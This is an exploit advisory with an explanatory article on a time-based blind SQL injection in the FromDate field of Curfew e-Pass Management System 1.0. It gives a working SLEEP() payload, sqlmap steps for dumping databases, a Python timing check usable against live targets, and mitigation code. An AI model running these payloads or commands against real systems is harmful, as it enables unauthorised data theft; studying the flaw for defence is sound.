Curfew e-Pass Management System 1.0 - FromDate SQL Injection

Exploit Author: Puja Dey
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2024-02-05
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) Log in to the application.
2) Open the "Report on pass" page, submit the report form and capture the request in Burp Suite.
3) The "FromDate" field (POST parameter fromdate) is vulnerable to SQL injection. sqlmap reports it as:
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit=
4) In the captured raw request, replace the fromdate value with '*' (sqlmap's custom injection mark, which is why the parameter is listed as "#1* (custom)") and save the request as cpme.
5) Run sqlmap -r cpme --batch --dbs --random-agent


Curfew e-Pass Management System 1.0: A Deep Dive into FromDate SQL Injection Vulnerability

Security vulnerabilities in web applications remain a persistent threat, especially in small hand-written PHP applications that build SQL by string concatenation. The Curfew e-Pass Management System 1.0, developed by phpgurukul.com, is an example of how an ordinary report filter can expose a critical flaw. This article examines a vulnerability in the FromDate parameter of the pass report that enables time-based blind SQL injection, a technique that lets an attacker extract data even though the page never displays query results or database errors.

Understanding the Vulnerability

The system manages curfew passes and lets a user generate a report of pass details for a date range. The FromDate field sets the start of that range. The value reaches the SQL query without validation or parameterization, so it is injectable.

During testing, the researcher found that when the fromdate parameter carries a crafted payload, the server's response is delayed by the duration of a MySQL SLEEP() call embedded in that payload. This is the signature of time-based blind SQL injection: the page itself looks identical, and the attacker infers data one true/false question at a time by measuring response delays.

Exploitation Process and Payload Analysis

Here is the malicious payload used to exploit the vulnerability:


fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit=

Explanation:

  • fromdate=' : The single quote closes the string literal the application wraps around the date value, so everything after it is parsed as SQL rather than as part of the date.
  • AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) : A derived table (aliased Kdfl) whose single row is produced by calling SLEEP(5); evaluating it pauses MySQL for 5 seconds. The constant 6290 and the alias are random values generated by sqlmap and carry no meaning.
  • AND 'SOzQ'='SOzQ : An always-true comparison whose final quote is deliberately left open so that the application's own closing quote completes it. This keeps the statement syntactically valid; without it the query would fail with a syntax error and the delay would never occur.
  • &todate=&submit= : The remaining form fields, sent empty so the request matches what the report form normally submits. They play no part in the injection.

When this payload is sent, the server takes roughly 5 seconds longer than a normal request to respond, which indicates that SLEEP() executed inside the query even though no output is shown. A single slow response is not proof, since network jitter or server load can also delay a page: measure a baseline first, then confirm that the delay scales with the value passed to SLEEP(), as sqlmap does before it reports a parameter as injectable.
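To make the timing check concrete, the following Python is an added example written for this article; it is not code from the exploit or from the phpgurukul project. The query template, table and column names are assumptions (the page does not show the application's SQL), and the "endpoint" is a local stand-in that sleeps when it sees SLEEP(n), so the check runs offline. It renders where the payload lands in the concatenated query and then applies the baseline-plus-scaling rule described above.

```python
import re
import time
from statistics import median

# Assumed shape of the vulnerable query. The page does not show the
# application's SQL, so this template and the table/column names are an
# assumption used only to render what string concatenation produces.
QUERY_TEMPLATE = ("SELECT * FROM tblpass WHERE PassDate >= '{fromdate}' "
                  "AND PassDate <= '{todate}'")


def render_vulnerable_query(fromdate, todate=""):
    """Splice the raw form values into the SQL text, as the flaw implies."""
    return QUERY_TEMPLATE.format(fromdate=fromdate, todate=todate)


def sleep_payload(seconds):
    """The page's payload with the SLEEP() duration made variable."""
    return (f"' AND (SELECT 6290 FROM (SELECT(SLEEP({seconds})))Kdfl) "
            "AND 'SOzQ'='SOzQ")


def timed(send, fromdate):
    """Send one request via the supplied callable and return elapsed seconds."""
    start = time.monotonic()
    send({"fromdate": fromdate, "todate": "", "submit": ""})
    return time.monotonic() - start


def is_time_based_injectable(send, delays=(2, 4), baseline_runs=3, ratio=0.8):
    """Time-based blind confirmation.

    A single slow response proves nothing (network jitter, server load), so
    the check takes a benign baseline, then requires the response to lag by
    at least `ratio` of each requested SLEEP and to grow with the delay.
    """
    baseline = median(timed(send, "2023-09-28") for _ in range(baseline_runs))
    observed = []
    for d in delays:
        elapsed = timed(send, sleep_payload(d))
        if elapsed - baseline < d * ratio:
            return False
        observed.append(elapsed)
    return all(later > earlier for earlier, later in zip(observed, observed[1:]))


def simulated_vulnerable_endpoint(params):
    """Constructed stand-in for the report page: concatenates the input and
    honours SLEEP(n) the way MySQL would, so the check runs offline."""
    sql = render_vulnerable_query(params["fromdate"], params["todate"])
    match = re.search(r"SLEEP\(([\d.]+)\)", sql)
    if match:
        time.sleep(float(match.group(1)))
    return sql


def simulated_patched_endpoint(params):
    """Stand-in for a parameterised query: the SLEEP text is bound as data
    and never executed, so there is no delay."""
    return None


if __name__ == "__main__":
    print(render_vulnerable_query(sleep_payload(5)))
    print("vulnerable:", is_time_based_injectable(simulated_vulnerable_endpoint, delays=(0.5, 1.0)))
    print("patched:   ", is_time_based_injectable(simulated_patched_endpoint, delays=(0.5, 1.0)))
```

Against a real target the `send` argument would be a function that POSTs the dictionary to the report page with the session cookie; the rest of the check is unchanged. Note that the rendered query has a balanced number of quotes only because the trailing `'SOzQ'='SOzQ` borrows the application's closing quote.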

Automated Exploitation with sqlmap

Once the vulnerability is confirmed, security researchers can leverage automated tools like sqlmap to extract database information. The following command demonstrates how to exploit the vulnerability:


sqlmap -r cpme --batch --dbs --random-agent

Explanation:

  • -r cpme : Reads the raw HTTP request saved from Burp, including cookies and the POST body, so sqlmap tests the same authenticated session. The '*' placed in the fromdate value tells sqlmap exactly where to inject.
  • --batch : Accepts sqlmap's default answer to every prompt, so the run needs no interaction.
  • --dbs : Enumerates the databases the application's account can see.
  • --random-agent : Sends a User-Agent picked at random from sqlmap's built-in list instead of the default sqlmap one, which some servers filter. It does not conceal the injection traffic itself.

Running this command lets sqlmap confirm the injection, fingerprint the database and list its names. From there --tables, --columns and --dump extract tables, columns and rows, including sensitive data such as user credentials or pass records. Because the channel is time-based, each request yields only a small amount of information and a full dump can take a long time, which is also what makes this technique visible in server logs.

Real-World Implications and Risks

This vulnerability poses significant risks in real-world scenarios:

  • Data Exposure: An attacker could extract user data, including names, contact details, and pass history.
  • Privilege Escalation: If administrator credentials or password hashes are stored in the same database, extracting them gives the attacker full control of the application.
  • System Integrity Compromise: Where the database account has write privileges and the query path allows it, injected SQL could delete or modify records or grant unauthorized access.

Because the system supports curfew management, a public safety function, such a vulnerability could be exploited to disrupt enforcement, create fake passes, or disable reporting.

Best Practices and Mitigation Strategies

To prevent such vulnerabilities, developers must follow secure coding practices:

Security Measure                Description
Parameterized Queries           Use prepared statements (mysqli or PDO with bound parameters) so that user input is always passed as data and can never alter the SQL text. This is the fix; the measures below are additional layers.
Input Validation                Validate every user input before it is used. For date fields require a strict format (YYYY-MM-DD) and a real calendar date, and reject anything else rather than trying to "clean" it.
Rate Limiting                   Throttle and alert on bursts of requests from one client. This slows automated tools such as sqlmap and makes probing visible in logs, but it does not close the flaw.
Web Application Firewall (WAF)  Deploy a WAF to detect and block common SQL injection patterns in real time. Treat it as defense in depth, since encoding and keyword variations can bypass signature rules.

Additionally, the vendor should release an updated version with the query fixed, and operators should not expose unpatched versions of this software in production environments.
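As an added example (not the vendor's code and not part of the original advisory), the following Python places the vulnerable string-built query beside the two defensive layers from the table above: a placeholder-bound query and strict date validation. It uses an in-memory SQLite table with constructed rows, and a constructed tautology payload instead of the page's SLEEP() payload because SQLite has no SLEEP() function. Table and column names are assumptions.

```python
import re
import sqlite3
from datetime import date

# Constructed input: a classic tautology rather than the page's SLEEP()
# payload, because SQLite (used here so the example runs offline) has no
# SLEEP() function. The leading "x" keeps the string comparison in the
# parameterised query unambiguous.
TAUTOLOGY = "x' OR '1'='1"


def make_db():
    """In-memory stand-in for the pass table. Schema and rows are constructed;
    the real application's table layout is not given on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE passes (id INTEGER PRIMARY KEY, holder TEXT, pass_date TEXT)")
    conn.executemany(
        "INSERT INTO passes (holder, pass_date) VALUES (?, ?)",
        [("alice", "2023-09-20"), ("bob", "2023-09-28"), ("carol", "2023-10-02")],
    )
    return conn


def report_vulnerable(conn, fromdate):
    """Mirrors the flaw: the form value is spliced into the SQL text."""
    sql = f"SELECT holder FROM passes WHERE pass_date >= '{fromdate}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def report_param_only(conn, fromdate):
    """Parameterised but unvalidated: the value is bound as a single literal,
    so it can no longer change the statement's structure."""
    sql = "SELECT holder FROM passes WHERE pass_date >= ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (fromdate,))]


def is_valid_date(value):
    """Strict YYYY-MM-DD check that also rejects impossible calendar dates."""
    if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", value):
        return False
    try:
        date.fromisoformat(value)
    except ValueError:
        return False
    return True


def report_hardened(conn, fromdate):
    """Both layers: reject anything that is not a real date, then bind it."""
    if not is_valid_date(fromdate):
        raise ValueError("fromdate must be a calendar date in YYYY-MM-DD form")
    return report_param_only(conn, fromdate)


def demo():
    """Run the variants against a fresh database and collect the results."""
    conn = make_db()
    return {
        "vulnerable_benign": report_vulnerable(conn, "2023-09-28"),
        "vulnerable_tautology": report_vulnerable(conn, TAUTOLOGY),
        "param_only_tautology": report_param_only(conn, TAUTOLOGY),
        "hardened_benign": report_hardened(conn, "2023-09-28"),
        "hardened_rejects_tautology": not is_valid_date(TAUTOLOGY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The tautology makes the string-built query return every row, while the bound version treats the whole payload as one literal date value and matches nothing. Validation is still worth keeping in front of the bound query: it rejects malformed input early with a clear error instead of letting it reach the database at all.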

Conclusion

The Curfew e-Pass Management System 1.0 shows how a single input field can become the entry point for a serious breach. The FromDate injection produces no visible output, yet time-based blind techniques turn it into read access to everything the application's database account can see. The case underscores the importance of parameterized queries, strict input validation, and proactive vulnerability management in public-facing systems.

Security is not a one-time task; it requires continuous monitoring, testing, and patching. Developers and administrators must treat every input as untrusted, especially in systems handling sensitive data.